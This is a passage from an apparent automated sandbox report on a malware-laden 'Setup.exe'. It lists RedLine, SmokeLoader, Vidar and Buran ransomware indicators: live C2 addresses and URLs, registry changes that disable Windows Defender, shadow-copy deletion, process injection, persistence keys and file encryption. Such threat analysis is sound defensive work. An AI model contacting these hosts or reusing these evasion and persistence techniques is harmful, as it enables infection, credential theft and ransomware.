Resubmissions
15-10-2024 15:36
241015-s1zlzasdkc 1001-07-2024 18:32
240701-w6yteawhmq 1001-07-2024 14:52
240701-r82wmaxdnd 1001-07-2024 14:52
240701-r8syqa1dpp 1011-03-2024 21:22
240311-z8dsssgg58 1001-09-2021 13:18
210901-5bmxjspa5s 1001-09-2021 13:04
210901-te4btfspqa 1001-09-2021 05:12
210901-4wnkwm1p3j 1031-08-2021 21:47
210831-41rp97dma2 1031-08-2021 19:51
210831-359awwatje 10Analysis
-
max time kernel
569s -
max time network
1823s -
platform
windows11_x64 -
resource
win11 -
submitted
27-08-2021 16:31
Static task
static1
Behavioral task
behavioral1
Sample
Setup (4).exe
Resource
win11
Behavioral task
behavioral2
Sample
Setup (5).exe
Resource
win11
Behavioral task
behavioral3
Sample
Setup (6).exe
Resource
win11
Behavioral task
behavioral4
Sample
Setup (7).exe
Resource
win11
Behavioral task
behavioral5
Sample
Setup (8).exe
Resource
win11
Behavioral task
behavioral6
Sample
Setup (9).exe
Resource
win11
Behavioral task
behavioral7
Sample
Setup.exe
Resource
win11
General
-
Target
Setup.exe
-
Size
631KB
-
MD5
cb927513ff8ebff4dd52a47f7e42f934
-
SHA1
0de47c02a8adc4940a6c18621b4e4a619641d029
-
SHA256
fd5c970806fba1500cbb6af5328329aeb43b8de3f02d90ec5d8cd1d57711622f
-
SHA512
988c8fd886a9155b7d190faf2ce6b34d910efcffcf1c6251f18a9d0c804a0ea26a89679273033ac98b200363c536426efd1ae9de445c34e660369abb06f0071c
Malware Config
Extracted
https://kmsauto.us/ALL.txt
Extracted
https://kmsauto.us/ra/ALL.txt
Extracted
C:\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
C:\Users\Admin\Desktop\!!! ALL YOUR FILES ARE ENCRYPTED !!!.TXT
buran
Extracted
redline
supertraff
135.148.139.222:1494
Extracted
redline
27.08
95.181.172.100:55640
Extracted
redline
dibild2
135.148.139.222:1494
Extracted
smokeloader
2020
http://readinglistforaugust1.xyz/
http://readinglistforaugust2.xyz/
http://readinglistforaugust3.xyz/
http://readinglistforaugust4.xyz/
http://readinglistforaugust5.xyz/
http://readinglistforaugust6.xyz/
http://readinglistforaugust7.xyz/
http://readinglistforaugust8.xyz/
http://readinglistforaugust9.xyz/
http://readinglistforaugust10.xyz/
http://readinglistforaugust1.site/
http://readinglistforaugust2.site/
http://readinglistforaugust3.site/
http://readinglistforaugust4.site/
http://readinglistforaugust5.site/
http://readinglistforaugust6.site/
http://readinglistforaugust7.site/
http://readinglistforaugust8.site/
http://readinglistforaugust9.site/
http://readinglistforaugust10.site/
http://readinglistforaugust1.club/
http://readinglistforaugust2.club/
http://readinglistforaugust3.club/
http://readinglistforaugust4.club/
http://readinglistforaugust5.club/
http://readinglistforaugust6.club/
http://readinglistforaugust7.club/
http://readinglistforaugust8.club/
http://readinglistforaugust9.club/
http://readinglistforaugust10.club/
Signatures
-
Buran
Ransomware-as-a-service based on the VegaLocker family first identified in 2019.
-
Process spawned unexpected child process 1 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 5020 3552 rundll32.exe 171 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 24 IoCs
resource yara_rule behavioral7/memory/704-317-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/704-319-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral7/memory/1488-316-0x0000000000400000-0x0000000000422000-memory.dmp family_redline behavioral7/memory/1488-315-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/3184-330-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/3184-332-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral7/memory/3544-336-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5344-359-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5152-351-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5716-389-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5884-398-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/4904-435-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5344-434-0x0000000005130000-0x0000000005748000-memory.dmp family_redline behavioral7/memory/5152-423-0x00000000058A0000-0x0000000005EB8000-memory.dmp family_redline behavioral7/memory/3452-442-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/3544-440-0x0000000004FE0000-0x0000000005586000-memory.dmp family_redline behavioral7/memory/5188-456-0x0000000000000000-mapping.dmp family_redline behavioral7/memory/5296-632-0x0000000004F80000-0x0000000005598000-memory.dmp family_redline behavioral7/memory/4524-681-0x0000000004DB0000-0x00000000053C8000-memory.dmp family_redline behavioral7/memory/5036-691-0x0000000004E70000-0x0000000005416000-memory.dmp family_redline behavioral7/memory/6360-737-0x0000000005340000-0x0000000005958000-memory.dmp family_redline behavioral7/memory/6536-745-0x00000000051A0000-0x00000000057B8000-memory.dmp family_redline behavioral7/memory/3044-784-0x0000000005440000-0x0000000005A58000-memory.dmp family_redline behavioral7/memory/7004-807-0x0000000004D80000-0x0000000005398000-memory.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Suspicious use of NtCreateProcessExOtherParentProcess 31 IoCs
description pid Process procid_target PID 916 created 2996 916 WerFault.exe 115 PID 4340 created 3136 4340 cmd.exe 110 PID 1056 created 3956 1056 WerFault.exe 132 PID 1180 created 2536 1180 WerFault.exe 103 PID 780 created 3400 780 ngj6VgNORD6ZXFJhogbAqawS.exe 193 PID 5400 created 4636 5400 WerFault.exe 278 PID 5552 created 132 5552 WerFault.exe 196 PID 2272 created 2580 2272 41qquykCPBvzT0C9LSCnJdjf.exe 88 PID 6556 created 2196 6556 WerFault.exe 217 PID 6472 created 792 6472 WerFault.exe 655 PID 4816 created 6960 4816 41qquykCPBvzT0C9LSCnJdjf.exe 230 PID 5784 created 6568 5784 WerFault.exe 245 PID 6308 created 4712 6308 ngj6VgNORD6ZXFJhogbAqawS.exe 702 PID 5228 created 1104 5228 WerFault.exe 932 PID 5240 created 6972 5240 WerFault.exe 327 PID 4076 created 7740 4076 WerFault.exe 418 PID 4328 created 5192 4328 WerFault.exe 305 PID 8004 created 1628 8004 WerFault.exe 299 PID 2156 created 4172 2156 41qquykCPBvzT0C9LSCnJdjf.exe 375 PID 2960 created 3152 2960 WerFault.exe 320 PID 1132 created 8024 1132 WerFault.exe 410 PID 3460 created 6516 3460 WerFault.exe 404 PID 7224 created 7880 7224 WerFault.exe 426 PID 2240 created 5212 2240 WerFault.exe 447 PID 508 created 7436 508 WerFault.exe 488 PID 6436 created 7264 6436 WerFault.exe 489 PID 7736 created 1300 7736 WerFault.exe 502 PID 5604 created 6148 5604 WerFault.exe 220 PID 8724 created 8352 8724 WerFault.exe 529 PID 5216 created 7912 5216 WerFault.exe 564 PID 5044 created 1636 5044 WerFault.exe 232 -
Suspicious use of NtCreateUserProcessOtherParentProcess 2 IoCs
description pid Process procid_target PID 4332 created 1056 4332 svchost.exe 168 PID 4332 created 1056 4332 svchost.exe 168 -
Turns off Windows Defender SpyNet reporting 2 TTPs
-
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
suricata: ET MALWARE Sharik/Smoke CnC Beacon 11
-
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 3 IoCs
resource yara_rule behavioral7/memory/2536-493-0x00000000026B0000-0x000000000274D000-memory.dmp family_vidar behavioral7/memory/2580-582-0x0000000002590000-0x000000000262D000-memory.dmp family_vidar behavioral7/memory/3044-784-0x0000000005440000-0x0000000005A58000-memory.dmp family_vidar -
Blocklisted process makes network request 15 IoCs
flow pid Process 132 3384 mshta.exe 186 1104 rundll32.exe 863 1636 powershell.exe 915 6148 powershell.exe 1061 1636 powershell.exe 1064 1636 powershell.exe 1119 6148 powershell.exe 1127 6148 powershell.exe 1310 2192 RUNDLL32.EXE 1340 2192 RUNDLL32.EXE 1448 2192 RUNDLL32.EXE 1484 2192 RUNDLL32.EXE 1883 2192 RUNDLL32.EXE 1889 2192 RUNDLL32.EXE 2635 2192 RUNDLL32.EXE -
Downloads MZ/PE file
-
Executes dropped EXE 64 IoCs
pid Process 4300 Y8LE_a6emvYyv9d67QKtEh5h.exe 4636 lqtegPSCqaQL0BkETsnNX2J5.exe 4816 OrtvqXJXXZ53o_eOhODIyXyC.exe 4712 NkxB2pYtHkSH45YtWxIgEnEI.exe 4696 LaGOi5FqrajxvOhiyDFqs9Zw.exe 2536 ZF2JIxFMOfpfwaF58aLf1Bpz.exe 3320 RZm4hyoREtWQ6FoyHVQskFuM.exe 2476 i9Ug0Yhw5wIgttQylm6TglZd.exe 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 2564 RTkOCBhKilxQpTnUe0g7bA4p.exe 5024 ISrB_dvDm1IkVUo_XGeYeA5p.exe 2884 gBaUMdeBsiBdikEiNiY5NoXS.exe 772 o9bhD_cFtB6ZOF1w10k76AMZ.exe 792 sOyXqXENHJ2NeF5SGRuq1HDW.exe 4632 xazowB24hxO2_b9ZeaYd6yML.exe 2580 uFkBkc5ExbcwhNMe_DNXMk3Z.exe 820 41qquykCPBvzT0C9LSCnJdjf.exe 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 3336 7eEWh0L0pAvqqP97gK6ntuOs.exe 2312 S2XPB9E_c2fXgAtzyOsjFidz.exe 3136 wRjVMQ1PYxXtiVtgmNMf7BTO.exe 4720 DZJdoQBawZIRTjYfBFodSs03.exe 1040 fwJPGcKeapxGI5TMIlFg4jU2.exe 3992 hPpyHuT7psBThm6HyOXDo1aV.exe 1280 IS_NZxa8lhsvv7R9sciRpeRY.exe 1296 69RtbxtHnFhksAVvQdMnJQA2.exe 2996 854WcJGsU9ff7sZQkeCXMgYJ.exe 3200 yCOvp7UX24Wr6u_GM4KLa_3O.exe 3024 cutm3.exe 4156 md8_8eus.exe 4904 41qquykCPBvzT0C9LSCnJdjf.exe 1056 WerFault.exe 3956 Ou3tPfureT.exe 1488 6dhUUwCP6tPiAlc2CrtbXtjY.exe 704 41qquykCPBvzT0C9LSCnJdjf.exe 5128 41qquykCPBvzT0C9LSCnJdjf.exe 3184 ngj6VgNORD6ZXFJhogbAqawS.exe 3544 6dhUUwCP6tPiAlc2CrtbXtjY.exe 5296 41qquykCPBvzT0C9LSCnJdjf.exe 5152 41qquykCPBvzT0C9LSCnJdjf.exe 5344 ngj6VgNORD6ZXFJhogbAqawS.exe 5608 Bx0IuOFB.ExE 5700 XCpA6wq6.com 5572 41qquykCPBvzT0C9LSCnJdjf.exe 5428 ngj6VgNORD6ZXFJhogbAqawS.exe 5716 ngj6VgNORD6ZXFJhogbAqawS.exe 5884 41qquykCPBvzT0C9LSCnJdjf.exe 6052 6dhUUwCP6tPiAlc2CrtbXtjY.exe 4904 41qquykCPBvzT0C9LSCnJdjf.exe 3452 ngj6VgNORD6ZXFJhogbAqawS.exe 5188 6dhUUwCP6tPiAlc2CrtbXtjY.exe 1204 ngj6VgNORD6ZXFJhogbAqawS.exe 4084 41qquykCPBvzT0C9LSCnJdjf.exe 6028 6dhUUwCP6tPiAlc2CrtbXtjY.exe 4796 41qquykCPBvzT0C9LSCnJdjf.exe 3400 ngj6VgNORD6ZXFJhogbAqawS.exe 2896 6dhUUwCP6tPiAlc2CrtbXtjY.exe 5296 41qquykCPBvzT0C9LSCnJdjf.exe 5036 6dhUUwCP6tPiAlc2CrtbXtjY.exe 5084 41qquykCPBvzT0C9LSCnJdjf.exe 4524 ngj6VgNORD6ZXFJhogbAqawS.exe 4772 ngj6VgNORD6ZXFJhogbAqawS.exe 1480 6dhUUwCP6tPiAlc2CrtbXtjY.exe 2196 41qquykCPBvzT0C9LSCnJdjf.exe -
Checks BIOS information in registry 2 TTPs 6 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion hPpyHuT7psBThm6HyOXDo1aV.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion hPpyHuT7psBThm6HyOXDo1aV.exe -
Loads dropped DLL 5 IoCs
pid Process 132 rundll32.exe 1104 rundll32.exe 5560 rundll32.exe 5560 rundll32.exe 2192 RUNDLL32.EXE -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral7/files/0x000200000002b1c9-193.dat themida behavioral7/files/0x000200000002b1e1-185.dat themida behavioral7/files/0x000200000002b1e9-214.dat themida behavioral7/files/0x000200000002b1e1-248.dat themida behavioral7/files/0x000200000002b1e9-250.dat themida behavioral7/files/0x000200000002b1c9-223.dat themida behavioral7/memory/4632-311-0x0000000000370000-0x0000000000371000-memory.dmp themida behavioral7/memory/3992-335-0x0000000000520000-0x0000000000521000-memory.dmp themida -
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SpyNetReporting = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\Documents\gBaUMdeBsiBdikEiNiY5NoXS.exe = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection gBaUMdeBsiBdikEiNiY5NoXS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" gBaUMdeBsiBdikEiNiY5NoXS.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet gBaUMdeBsiBdikEiNiY5NoXS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Spynet\SubmitSamplesConsent = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features gBaUMdeBsiBdikEiNiY5NoXS.exe Key created \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Real-Time Protection 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions\Paths gBaUMdeBsiBdikEiNiY5NoXS.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Exclusions gBaUMdeBsiBdikEiNiY5NoXS.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 2 IoCs
description ioc Process Key created \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run 8505.exe Set value (str) \REGISTRY\USER\S-1-5-21-257790753-2419383948-818201544-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost.exe = "\"C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\Windows\\svchost.exe\" -start" 8505.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA xazowB24hxO2_b9ZeaYd6yML.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA hPpyHuT7psBThm6HyOXDo1aV.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 6dhUUwCP6tPiAlc2CrtbXtjY.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA gBaUMdeBsiBdikEiNiY5NoXS.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" gBaUMdeBsiBdikEiNiY5NoXS.exe -
Enumerates connected drives 3 TTPs 48 IoCs
Attempts to read the root path of hard drives other than the default C: drive.
description ioc Process File opened (read-only) \??\J: 8505.exe File opened (read-only) \??\I: 8505.exe File opened (read-only) \??\P: svchost.exe File opened (read-only) \??\N: 8505.exe File opened (read-only) \??\B: 8505.exe File opened (read-only) \??\T: svchost.exe File opened (read-only) \??\H: svchost.exe File opened (read-only) \??\M: svchost.exe File opened (read-only) \??\L: svchost.exe File opened (read-only) \??\E: svchost.exe File opened (read-only) \??\Y: 8505.exe File opened (read-only) \??\V: 8505.exe File opened (read-only) \??\U: 8505.exe File opened (read-only) \??\T: 8505.exe File opened (read-only) \??\R: 8505.exe File opened (read-only) \??\Z: svchost.exe File opened (read-only) \??\U: svchost.exe File opened (read-only) \??\N: svchost.exe File opened (read-only) \??\J: svchost.exe File opened (read-only) \??\W: svchost.exe File opened (read-only) \??\K: svchost.exe File opened (read-only) \??\I: svchost.exe File opened (read-only) \??\X: 8505.exe File opened (read-only) \??\W: 8505.exe File opened (read-only) \??\P: 8505.exe File opened (read-only) \??\G: 8505.exe File opened (read-only) \??\Y: svchost.exe File opened (read-only) \??\G: svchost.exe File opened (read-only) \??\A: svchost.exe File opened (read-only) \??\E: 8505.exe File opened (read-only) \??\A: 8505.exe File opened (read-only) \??\S: svchost.exe File opened (read-only) \??\F: svchost.exe File opened (read-only) \??\B: svchost.exe File opened (read-only) \??\Z: 8505.exe File opened (read-only) \??\Q: 8505.exe File opened (read-only) \??\F: 8505.exe File opened (read-only) \??\V: svchost.exe File opened (read-only) \??\Q: svchost.exe File opened (read-only) \??\H: 8505.exe File opened (read-only) \??\X: svchost.exe File opened (read-only) \??\R: svchost.exe File opened (read-only) \??\S: 8505.exe File opened (read-only) \??\O: 8505.exe File opened (read-only) \??\M: 8505.exe File opened (read-only) \??\L: 8505.exe File opened (read-only) \??\K: 8505.exe File opened (read-only) \??\O: svchost.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 8 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 105 ipinfo.io 354 geoiptool.com 8 ipinfo.io 8 api.db-ip.com 8 ip-api.com 33 ipinfo.io 35 api.db-ip.com 55 ipinfo.io -
Suspicious use of NtSetInformationThreadHideFromDebugger 3 IoCs
pid Process 4632 xazowB24hxO2_b9ZeaYd6yML.exe 3992 hPpyHuT7psBThm6HyOXDo1aV.exe 5024 6dhUUwCP6tPiAlc2CrtbXtjY.exe -
Suspicious use of SetThreadContext 64 IoCs
description pid Process procid_target PID 2484 set thread context of 1488 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 131 PID 820 set thread context of 704 820 41qquykCPBvzT0C9LSCnJdjf.exe 139 PID 2548 set thread context of 3184 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 145 PID 2484 set thread context of 3544 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 147 PID 820 set thread context of 5152 820 41qquykCPBvzT0C9LSCnJdjf.exe 149 PID 2548 set thread context of 5344 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 154 PID 2548 set thread context of 5716 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 160 PID 820 set thread context of 5884 820 41qquykCPBvzT0C9LSCnJdjf.exe 161 PID 3956 set thread context of 5544 3956 Ou3tPfureT.exe 166 PID 820 set thread context of 4904 820 41qquykCPBvzT0C9LSCnJdjf.exe 174 PID 2548 set thread context of 3452 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 167 PID 2484 set thread context of 5188 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 170 PID 2548 set thread context of 1204 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 183 PID 820 set thread context of 4796 820 41qquykCPBvzT0C9LSCnJdjf.exe 195 PID 2548 set thread context of 3400 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 193 PID 2484 set thread context of 2896 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 192 PID 2884 set thread context of 6108 2884 gBaUMdeBsiBdikEiNiY5NoXS.exe 199 PID 820 set thread context of 5296 820 41qquykCPBvzT0C9LSCnJdjf.exe 198 PID 2484 set thread context of 5036 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 202 PID 2548 set thread context of 4524 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 201 PID 2476 set thread context of 4772 2476 i9Ug0Yhw5wIgttQylm6TglZd.exe 465 PID 2484 set thread context of 1480 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 211 PID 820 set thread context of 2196 820 41qquykCPBvzT0C9LSCnJdjf.exe 217 PID 4720 set thread context of 3044 4720 DZJdoQBawZIRTjYfBFodSs03.exe 212 PID 4816 set thread context of 4732 4816 41qquykCPBvzT0C9LSCnJdjf.exe 214 PID 2548 set thread context of 4356 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 219 PID 2548 set thread context of 6536 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 225 PID 2484 set thread context of 6340 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 227 PID 820 set thread context of 6360 820 41qquykCPBvzT0C9LSCnJdjf.exe 222 PID 2484 set thread context of 6960 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 230 PID 2548 set thread context of 6900 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 231 PID 820 set thread context of 7004 820 41qquykCPBvzT0C9LSCnJdjf.exe 228 PID 820 set thread context of 6432 820 41qquykCPBvzT0C9LSCnJdjf.exe 239 PID 2548 set thread context of 6416 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 237 PID 820 set thread context of 6808 820 41qquykCPBvzT0C9LSCnJdjf.exe 240 PID 2484 set thread context of 5116 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 234 PID 2548 set thread context of 6560 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 241 PID 820 set thread context of 1460 820 41qquykCPBvzT0C9LSCnJdjf.exe 243 PID 2484 set thread context of 3080 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 248 PID 820 set thread context of 6196 820 41qquykCPBvzT0C9LSCnJdjf.exe 249 PID 820 set thread context of 4960 820 41qquykCPBvzT0C9LSCnJdjf.exe 255 PID 2548 set thread context of 6576 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 253 PID 6568 set thread context of 6388 6568 KU6UUiwSos.exe 252 PID 3320 set thread context of 5196 3320 RZm4hyoREtWQ6FoyHVQskFuM.exe 263 PID 2548 set thread context of 3684 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 259 PID 820 set thread context of 1632 820 41qquykCPBvzT0C9LSCnJdjf.exe 265 PID 2484 set thread context of 3880 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 269 PID 2548 set thread context of 1040 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 271 PID 820 set thread context of 4816 820 41qquykCPBvzT0C9LSCnJdjf.exe 272 PID 820 set thread context of 4636 820 41qquykCPBvzT0C9LSCnJdjf.exe 278 PID 2484 set thread context of 5652 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 280 PID 2548 set thread context of 2568 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 279 PID 2548 set thread context of 972 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 284 PID 2484 set thread context of 2908 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 283 PID 820 set thread context of 5256 820 41qquykCPBvzT0C9LSCnJdjf.exe 285 PID 2484 set thread context of 5436 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 286 PID 2548 set thread context of 5672 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 289 PID 820 set thread context of 7108 820 41qquykCPBvzT0C9LSCnJdjf.exe 290 PID 2484 set thread context of 1476 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 292 PID 2548 set thread context of 3720 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 291 PID 2548 set thread context of 6204 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 297 PID 820 set thread context of 2080 820 41qquykCPBvzT0C9LSCnJdjf.exe 294 PID 2484 set thread context of 2828 2484 6dhUUwCP6tPiAlc2CrtbXtjY.exe 296 PID 2548 set thread context of 5896 2548 ngj6VgNORD6ZXFJhogbAqawS.exe 298 -
Drops file in Program Files directory 64 IoCs
description ioc Process File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp2-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Grace-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteVL_MAK-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.common.16.xml 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Effects\Milk Glass.eftx 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest1-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest3-ul-oob.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Office 2007 - 2010.xml.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Trial-ul-oob.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Grace-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudent2019R_Trial-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_SubTest2-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremR_SubTest5-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription5-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Colors\Yellow.xml.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Access2019R_Trial-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusiness2019R_OEM_Perp-ul-phn.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeStudentVNextR_Grace-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial5-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_OEM_Perp-pl.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Excel2019R_Retail-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365HomePremDemoR_BypassTrial365-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365SmallBusPremR_SubTrial4-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses\c2rpridslicensefiles_auto.xml 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_O17EnterpriseVL_Bypass30-ppd.xrm-ms 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\MondoR_Trial-ppd.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\O365ProPlusR_Subscription1-pl.xrm-ms.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\PackageManifests\AppXManifest.90160000-001B-0000-1000-0000000FF1CE.xml 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Document Themes 16\Theme Fonts\Century Gothic.xml.payfast290.2D4-FBD-19D 8505.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\AccessVL_MAK-ul-phn.xrm-ms 8505.exe File opened for modification 